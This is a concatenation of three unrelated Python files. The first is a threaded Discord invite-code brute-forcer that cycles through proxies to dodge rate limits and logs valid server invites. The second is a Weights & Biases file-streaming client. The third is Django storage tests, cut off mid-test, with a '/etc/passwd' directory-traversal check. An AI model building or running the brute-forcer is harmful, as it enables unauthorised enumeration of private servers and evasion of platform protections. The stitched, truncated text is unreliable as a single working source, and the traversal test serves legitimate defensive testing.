from colorama import Fore, Style
colorama.init()
def logo():
msg = Fore.LIGHTBLUE_EX +"""
.___ .__ __ __________
| | _______ _|__|/ |_ ____ \____ /
| |/ \ \/ / \ __\/ __ \ / /
| | | \ /| || | \ ___/ / /_
|___|___| /\_/ |__||__| \___ > /_______ \
\/ \/ \/
"""
print(msg)
def menu():
os.system("cls")
system("title " + "InviteZ by FGLX#9999")
logo()
print("")
print("{} ╔═══Main Menu═════════════════╗{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + "[1] -" + Fore.RESET + " Invite Brute Force " + Fore.LIGHTMAGENTA_EX + " ║" + Fore.RESET)
print("{} ╚═════════════════════════════╝{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
hit = 0
check = 0
bad = 0
proxies = 0
def nitroNormal():
global check
global hit
global bad
global proxies
while True:
with open(txt) as f:
for line in f:
prox = line.strip("\n")
proxy = {
'https' : f'http://{prox}'
}
system("title " + "Hits:" + f'{hit}' + " Bad:" + f'{bad}' + " Checked:" + f'{check}' + " Failed Proxies:" + f'{proxies}')
code = ('').join(random.choices(string.ascii_letters + string.digits, k=codelength))
try:
r = requests.get(f"https://discord.com/api/v8/invites/"+code+"?with_counts=true", proxies=proxy, timeout=timeouttime)
if r.status_code == 200:
check += 1
hit += 1
print(Fore.GREEN+"Valid"+Fore.LIGHTWHITE_EX+" | "+Fore.BLUE+f"https://discord.gg/{code} ")
print(Fore.YELLOW+"Proxy in use "+Fore.LIGHTWHITE_EX+" | "+Fore.GREEN+f"{prox}")
with open("Good.txt", "a+") as (k):
k.writelines(f"https://discord.gg/{code}\n")
else:
check += 1
bad += 1
print(Fore.RED+"Invalid"+Fore.LIGHTWHITE_EX+" | "+Fore.BLUE+f"https://discord.gg/{code} ")
print(Fore.YELLOW+"Proxy in use "+Fore.LIGHTWHITE_EX+"|"+Fore.GREEN+f"{prox}")
with open("Bad.txt", "a+") as (f):
f.writelines(f"https://discord.gg/{code}\n")
except:
print(Fore.RED+"Proxy Failed"+Fore.LIGHTWHITE_EX+" |"+Fore.RED+f" {prox}")
proxies += 1
pass
menu()
print(Fore.LIGHTBLUE_EX)
option = int(input("[?]"))
while option != 0:
if option == 1:
os.system("cls")
logo()
txtname = input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"import Https Proxys:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX)
txt = f"{txtname}.txt"
pamount = 0
with open(txt) as f:
for line in f:
prox = line.strip("\n")
pamount += 1
print(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +f"{pamount}"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX+"Proxies Loaded")
timeouttime = int(input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"Proxy Timeout Time:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX))
print("Dont use more then 100 if you dont have HQ proxies")
threads = int(input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"Amount of Threads:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX))
codelength = int(input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"Code length:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX))
os.system("cls")
for x in range(threads):
x = threading.Thread(target=nitroNormal)
x.start()
pass
else:
print("Invalid Option")
os.system("cls")
menu()
print(Fore.LIGHTBLUE_EX)
option = int(input("[?]"))
|
file_stream.py
|
import base64
import binascii
import collections
import logging
import threading
import requests
import time
import wandb
import itertools
from six.moves import queue
from wandb import util
from wandb import env
MAX_LINE_SIZE = 4*1024*1024 - 100*1024 # imposed by back end
logger = logging.getLogger(__name__)
Chunk = collections.namedtuple('Chunk', ('filename', 'data'))
class DefaultFilePolicy(object):
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
chunk_id = self._chunk_id
self._chunk_id += len(chunks)
return {
'offset': chunk_id,
'content': [c.data for c in chunks]
}
class JsonlFilePolicy(object):
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
chunk_id = self._chunk_id
self._chunk_id += len(chunks)
chunk_data = []
for chunk in chunks:
if len(chunk.data) > MAX_LINE_SIZE:
msg = 'Metric data exceeds maximum size of {} bytes. Dropping it.'.format(MAX_LINE_SIZE)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
else:
chunk_data.append(chunk.data)
return {
'offset': chunk_id,
'content': chunk_data,
}
class SummaryFilePolicy(object):
def process_chunks(self, chunks):
data = chunks[-1].data
if len(data) > MAX_LINE_SIZE:
msg = 'Summary data exceeds maximum size of {} bytes. Dropping it.'.format(MAX_LINE_SIZE)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
return False
return {
'offset': 0, 'content': [data]
}
class CRDedupeFilePolicy(object):
"""File stream policy that removes characters that would be erased by
carriage returns.
This is what a terminal does. We use it for console output to reduce the
amount of data we need to send over the network (eg. for progress bars),
while preserving the output's appearance in the web app.
"""
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
content = []
for line in [c.data for c in chunks]:
if content and content[-1].endswith('\r'):
content[-1] = line
else:
content.append(line)
chunk_id = self._chunk_id
self._chunk_id += len(content)
if content and content[-1].endswith('\r'):
self._chunk_id -= 1
return {
'offset': chunk_id,
'content': content
}
class BinaryFilePolicy(object):
def __init__(self):
self._offset = 0
def process_chunks(self, chunks):
data = b''.join([c.data for c in chunks])
enc = base64.b64encode(data).decode('ascii')
offset = self._offset
self._offset += len(data)
return {
'offset': self._offset,
'content': enc,
'encoding': 'base64'
}
class FileStreamApi(object):
"""Pushes chunks of files to our streaming endpoint.
This class is used as a singleton. It has a thread that serializes access to
the streaming endpoint and performs rate-limiting and batching.
TODO: Differentiate between binary/text encoding.
"""
Finish = collections.namedtuple('Finish', ('exitcode'))
HTTP_TIMEOUT = env.get_http_timeout(10)
MAX_ITEMS_PER_PUSH = 10000
def __init__(self, api, run_id):
self._api = api
self._run_id = run_id
self._client = requests.Session()
self._client.auth = ('api', api.api_key)
self._client.timeout = self.HTTP_TIMEOUT
self._client.headers.update({
'User-Agent': api.user_agent,
'X-WANDB-USERNAME': env.get_username(),
'X-WANDB-USER-EMAIL': env.get_user_email()
})
self._file_policies = {}
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_body)
# It seems we need to make this a daemon thread to get sync.py's atexit handler to run, which
# cleans this thread up.
self._thread.daemon = True
self._init_endpoint()
def _init_endpoint(self):
settings = self._api.settings()
self._endpoint = "{base}/files/{entity}/{project}/{run}/file_stream".format(
base=settings['base_url'],
entity=settings['entity'],
project=settings['project'],
run=self._run_id)
def start(self):
self._init_endpoint()
self._thread.start()
def set_default_file_policy(self, filename, file_policy):
"""Set an upload policy for a file unless one has already been set.
"""
if filename not in self._file_policies:
self._file_policies[filename] = file_policy
def set_file_policy(self, filename, file_policy):
self._file_policies[filename] = file_policy
@property
def heartbeat_seconds(self):
# Defaults to 30
return self._api.dynamic_settings["heartbeat_seconds"]
def rate_limit_seconds(self):
run_time = time.time() - wandb.START_TIME
if run_time < 60:
return max(1, self.heartbeat_seconds / 15)
elif run_time < 300:
return max(2.5, self.heartbeat_seconds / 3)
else:
return max(5, self.heartbeat_seconds)
def _read_queue(self):
# called from the push thread (_thread_body), this does an initial read
# that'll block for up to rate_limit_seconds. Then it tries to read
# as much out of the queue as it can. We do this because the http post
# to the server happens within _thread_body, and can take longer than
# our rate limit. So next time we get a chance to read the queue we want
# read all the stuff that queue'd up since last time.
#
# If we have more than MAX_ITEMS_PER_PUSH in the queue then the push thread
# will get behind and data will buffer up in the queue.
return util.read_many_from_queue(
self._queue, self.MAX_ITEMS_PER_PUSH, self.rate_limit_seconds())
def _thread_body(self):
posted_data_time = time.time()
posted_anything_time = time.time()
ready_chunks = []
finished = None
while finished is None:
items = self._read_queue()
for item in items:
if isinstance(item, self.Finish):
finished = item
else:
# item is Chunk
ready_chunks.append(item)
cur_time = time.time()
if ready_chunks and (finished or cur_time - posted_data_time > self.rate_limit_seconds()):
posted_data_time = cur_time
posted_anything_time = cur_time
self._send(ready_chunks)
ready_chunks = []
if cur_time - posted_anything_time > self.heartbeat_seconds:
posted_anything_time = cur_time
self._handle_response(util.request_with_retry(self._client.post,
self._endpoint, json={'complete': False, 'failed': False}))
# post the final close message. (item is self.Finish instance now)
util.request_with_retry(self._client.post,
self._endpoint, json={'complete': True, 'exitcode': int(finished.exitcode)})
def _handle_response(self, response):
"""Logs dropped chunks and updates dynamic settings"""
if isinstance(response, Exception):
raise response
wandb.termerror('Droppped streaming file chunk (see wandb/debug.log)')
logging.error("dropped chunk %s" % response)
elif response.json().get("limits"):
parsed = response.json()
self._api.dynamic_settings.update(parsed["limits"])
def _send(self, chunks):
# create files dict. dict of <filename: chunks> pairs where chunks is a list of
# [chunk_id, chunk_data] tuples (as lists since this will be json).
files = {}
# Groupby needs group keys to be consecutive, so sort first.
chunks.sort(key=lambda c: c.filename)
for filename, file_chunks in itertools.groupby(chunks, lambda c: c.filename):
file_chunks = list(file_chunks) # groupby returns iterator
self.set_default_file_policy(filename, DefaultFilePolicy())
files[filename] = self._file_policies[filename].process_chunks(
file_chunks)
if not files[filename]:
del files[filename]
self._handle_response(util.request_with_retry(
self._client.post, self._endpoint, json={'files': files}))
def stream_file(self, path):
name = path.split("/")[-1]
with open(path) as f:
done = False
first_line = next(f)
if len(first_line) > 500000:
lines_per_request = 2
elif len(first_line) > 100000:
lines_per_request = 10
elif len(first_line) > 10000:
lines_per_request = 100
elif len(first_line) > 1000:
lines_per_request = 1000
else:
lines_per_request = 10000
chunks = [Chunk(name, first_line)]
while True:
for i in range(lines_per_request - len(chunks)):
try:
line = next(f)
chunks.append(Chunk(name, line))
except StopIteration:
done = True
break
if len(chunks) > 0:
self._send(chunks)
chunks = []
if done:
break
def push(self, filename, data):
"""Push a chunk of a file to the streaming endpoint.
Args:
filename: Name of file that this is a chunk of.
chunk_id: TODO: change to 'offset'
chunk: File data.
"""
self._queue.put(Chunk(filename, data))
def finish(self, exitcode):
"""Cleans up.
Anything pushed after finish will be dropped.
Args:
exitcode: The exitcode of the watched process.
"""
self._queue.put(self.Finish(exitcode))
self._thread.join()
|
tests.py
|
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from pathlib import Path
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import (
FileSystemStorage, Storage as BaseStorage, default_storage,
get_storage_class,
)
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models import FileField
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import (
Storage, callable_storage, temp_storage, temp_storage_location,
)
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
self.addCleanup(self.storage.delete, 'storage_test_1')
self.addCleanup(self.storage.delete, 'storage_test_2')
for directory in ('', Path('')):
with self.subTest(directory=directory):
dirs, files = self.storage.listdir(directory)
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path, mode=0o777, exist_ok=False):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path, mode, exist_ok)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path, mode, exist_ok)
if not exist_ok:
raise FileExistsError()
elif path == os.path.join(self.temp_dir, 'error'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileExistsError are raised.
with self.assertRaises(PermissionError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise OSError
f1.chunks = failing_chunks
with self.assertRaises(OSError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
msg = 'The name must be given to delete().'
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete(None)
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overridden_media_root',
'MEDIA_URL': '/overridden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
def test_file_methods_pathlib_path(self):
p = Path('test.file')
self.assertFalse(self.storage.exists(p))
f = ContentFile('custom contents')
f_name = self.storage.save(p, f)
# Storage basic methods.
self.assertEqual(self.storage.path(p), os.path.join(self.temp_dir, p))
self.assertEqual(self.storage.size(p), 15)
self.assertEqual(self.storage.url(p), self.storage.base_url + f_name)
with self.storage.open(p) as f:
self.assertEqual(f.read(), b'custom contents')
self.addCleanup(self.storage.delete, p)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
basename, *ext = os.path.splitext(name)
number = 2
while self.exists(name):
name = ''.join([basename, '.', str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
"""
Overwrite existing files instead of appending a suffix to generate an
unused name.
"""
# Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
def get_available_name(self, name, max_length=None):
"""Override the effort to find an used name."""
return name
class OverwritingStorageTests(FileStorageTests):
storage_class = OverwritingStorage
def test_save_overwrite_behavior(self):
"""Saving to same file name twice overwrites the first file."""
name = 'test.file'
self.assertFalse(self.storage.exists(name))
content_1 = b'content one'
content_2 = b'second content'
f_1 = ContentFile(content_1)
f_2 = ContentFile(content_2)
stored_name_1 = self.storage.save(name, f_1)
try:
self.assertEqual(stored_name_1, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_1)
stored_name_2 = self.storage.save(name, f_2)
self.assertEqual(stored_name_2, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_2)
finally:
self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
